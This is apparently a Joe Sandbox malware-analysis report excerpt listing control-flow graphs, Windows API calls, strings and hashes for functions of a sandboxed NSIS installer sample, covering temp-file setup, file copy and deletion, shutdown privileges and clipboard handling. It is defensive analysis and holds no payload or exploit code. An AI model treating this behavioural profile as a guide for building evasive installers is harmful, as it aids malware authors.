DeleteFileW call 40307d 37->48 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 59 4037d6-4037d7 41->59 45 403714-40371b 42->45 46 40372c-403765 42->46 52 403722 45->52 53 40371d-403720 45->53 54 403781-4037bb 46->54 55 403767-40376c 46->55 47->48 62 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->62 64 403888-40388e 48->64 65 403a59-403a67 call 403b12 OleUninitialize 48->65 52->46 53->46 53->52 57 4037c3-4037c5 54->57 58 4037bd-4037c1 54->58 55->54 61 40376e-403776 55->61 57->41 58->57 63 4037e6-4037f3 call 40653d 58->63 59->32 66 403778-40377b 61->66 67 40377d 61->67 62->48 62->65 63->37 69 403894-4038a7 call 405e39 64->69 70 403935-40393c call 403bec 64->70 77 403a69-403a78 call 405b9d ExitProcess 65->77 78 403a7e-403a84 65->78 66->54 66->67 67->54 84 4038f9-403906 69->84 85 4038a9-4038de 69->85 80 403941-403944 70->80 82 403a86-403a9b GetCurrentProcess OpenProcessToken 78->82 83 403afc-403b04 78->83 80->65 91 403acc-403ada call 40690a 82->91 92 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 86 403b06 83->86 87 403b09-403b0c ExitProcess 83->87 88 403908-403916 call 405f14 84->88 89 403949-40395d call 405b08 lstrcatW 84->89 93 4038e0-4038e4 85->93 86->87 88->65 105 40391c-403932 call 40653d * 2 88->105 103 40396a-403984 lstrcatW lstrcmpiW 89->103 104 40395f-403965 lstrcatW 89->104 106 403ae8-403af3 ExitWindowsEx 91->106 107 403adc-403ae6 91->107 92->91 97 4038e6-4038eb 93->97 98 4038ed-4038f5 93->98 97->98 99 4038f7 97->99 98->93 98->99 99->84 108 403a57 103->108 109 40398a-40398d 103->109 104->103 105->70 106->83 111 403af5-403af7 call 40140b 106->111 107->106 107->111 108->65 112 403996 call 405aeb 109->112 113 40398f-403994 call 405a6e 109->113 111->83 121 40399b-4039ab SetCurrentDirectoryW 112->121 113->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 134 403a50-403a52 call 4062fd 131->134 132->131 133 403a18-403a38 call 4062fd call 40657a call 405b20 132->133 133->131 142 403a3a-403a41 CloseHandle 133->142 134->108 142->131
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                                                                                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                                                                                                                                • CharNextW.USER32(00000000,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe",00000020,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe",00000000), ref: 004036D6
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                                                                                                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Program Files (x86)\E6l40hhe,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe",00000000,?), ref: 0040397C
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                                                                                                                                • CopyFileW.KERNEL32(C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                                • String ID: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"$.tmp$1033$C:\Program Files (x86)\E6l40hhe$C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                • API String ID: 3859024572-1296904760
                                                                                                                                                                                                                                • Opcode ID: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 457 405cc1-405cc2 call 405e58 449->457 458 405cb4-405cbf lstrcatW 449->458 450->447 453 405dba-405dbd 450->453 451->449 451->450 455 405dc7-405dcf call 406873 453->455 456 405dbf-405dc5 453->456 455->447 466 405dd1-405de5 call 405e0c call 405c01 455->466 456->447 460 405cc7-405ccb 457->460 458->460 462 405cd7-405cdd lstrcatW 460->462 463 405ccd-405cd5 460->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->456 488 405dec-405dfb call 40559f call 4062fd 482->488 483->447 484->475 489 405d4c-405d55 call 405c49 484->489 493 405d83-405d86 call 40559f 485->493 494 405d64-405d67 485->494 488->447 489->475 493->475 497 405d69-405d79 call 40559f call 4062fd 494->497 498 405d7b-405d81 494->498 497->475 498->475
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\*.*), ref: 00405CBA
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 00405DA2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$\*.*
                                                                                                                                                                                                                                • API String ID: 2035342205-3920725043
                                                                                                                                                                                                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 724 406873-406887 FindFirstFileW 725 406894 724->725 726 406889-406892 FindClose 724->726 727 406896-406897 725->727 726->727
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F73420,004302B8,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00405F5D,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 0040688A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nslEFEC.tmp, xrefs: 00406873
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                • API String ID: 2295610775-3338105827
                                                                                                                                                                                                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004056DE Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 165 4057e4-4057e7 145->165 166 4057c8-4057e2 SendMessageW * 2 145->166 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 169 405917-40591b 154->169 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 167 405952-405965 SendMessageW 158->167 160->154 163 405930-405939 call 40559f 161->163 164 40593e-40593f call 404472 161->164 163->164 164->156 172 4057f7-40580e call 404499 165->172 173 4057e9-4057f5 SendMessageW 165->173 166->165 174 405a67-405a69 167->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 167->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->169 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 188 4059e2-4059fd SendMessageW 185->188 189 405839-40583f call 4044ce 186->189 187->189 188->188 191 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->191 189->183 192 405a24-405a4b SendMessageW 191->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405A61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                • String ID: {$q
                                                                                                                                                                                                                                • API String ID: 590372296-697821165
                                                                                                                                                                                                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403F9A Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
